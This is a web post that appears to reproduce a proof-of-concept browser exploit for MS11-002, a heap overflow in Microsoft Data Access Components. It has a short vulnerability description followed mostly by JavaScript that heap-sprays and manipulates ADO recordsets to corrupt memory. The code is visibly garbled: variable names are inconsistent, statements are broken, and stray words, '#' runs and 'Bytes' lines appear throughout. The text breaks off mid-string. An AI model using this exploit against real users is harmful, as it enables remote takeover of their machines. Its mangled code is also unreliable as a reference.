MS11-002/Microsoft Data Access Component Vulnerability

Microsoft Data Access Components: a remote code execution vulnerability exists in the method of verifying memory allocation. This vulnerability may allow remote code execution if a user accesses a special webpage. If a user logs on using the management user permission, attackers who successfully exploit this vulnerability can have full control over the affected system.

[+] Info:
~~~~~~~~~
Microsoft Data Access Components Vulnerability
Author: Peter Vreugdenhil

[+] Poc:
~~~~~~~~~

View sourceprint? 001

002

003 <meta name = "License" content = "Q Public License; http://en.wikipedia.org/wiki/Q_Public_License">

004 <style>

005. body {

006

007}

008 # test {

009

010}

011 </style>

012 <script src = "heapLib. js"> </script>

013 <script>

014 // This code has been released under the Q Public License by Trolltech

015 // http://en.wikipedia.org/wiki/Q_Public_License

016 // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/

017

018

019 var StartTime = new Date ();

020 var FinalHeapSpraySize = 900;

021 // var SmallHoleSize = 0x1F0;

022 var SmallHoleSize = 0x240;

023 var GlobalRowCounter = 0;

024

025 var localxmlid1;

026 var localxmlid2;

027 var localxmlid3;

028 var localxm1_5;

029 var adobase = 0;

030 var finalspray =;

031 var heap = null;

032 var ExpoitTime = 10;

033 var CurrentHeapSpraySize = 0;

034

035

036 function Start (){

037 FaseOne ();

038}

039

040

041

042 function FaseOne (){

043

044 localxmlid1 = document. getElementById (xmlid1). recordset;

045 localxmlid2 = document. getElementById (xmlid2). recordset;

046 localxmlid3 = document. getElementById (xmlid3). recordset;

047 localxm1_5 = document. getElementById (xm1_5). recordset;

048

049 localxm1_2.cachesize = 0x40000358;

050

051 localxm1_1.cachesize = SmallHoleSize; // small hole?

052 localxm1_1.addnew (["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "], [" c "]);

053 localxm1_5.addnew (["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

Bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb "], [" c "]);

 

054

055

056 var my1field = localxm1_5.fields. Item (0 );

057 localxm1_1.movefirst ();

058

059 localxm1_2.addnew (["BBBB"], ["c"]);

060

061 localxm1_1.close ();

062 CollectGarbage ();

063

064 localxm1_3.movefirst ();

065

066 void (Math. atan2 (0 xbabe, (###################### 2 Move First ). toString ()));

067 localxm1_2.movefirst ();

068

069 void (Math. atan2 (0 xbabe, (###################### 5 Move First ). toString ()));

070 localxm1_5.cachesize = 0x40000008;

071 localxm1_5.movefirst ();

072 localxm1_3.addnew (["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

LongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeL

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

DataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong "], [" Hangzhou "]);

073

074 var localxm1_4 = document. getElementById (xm1_4). recordset;

075

076 localxm00004.addnew (["bb"], ["c"]);

077

078 localxmlid4.MoveNext ();

079

080

081 var localxm1_6 = document. getElementById (xm1_6). recordset;

082 localxmlid6.AddNew (["cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

Ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

Ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

Cccccccccccccccccccccccccccccccccccccccccccccccccccccccc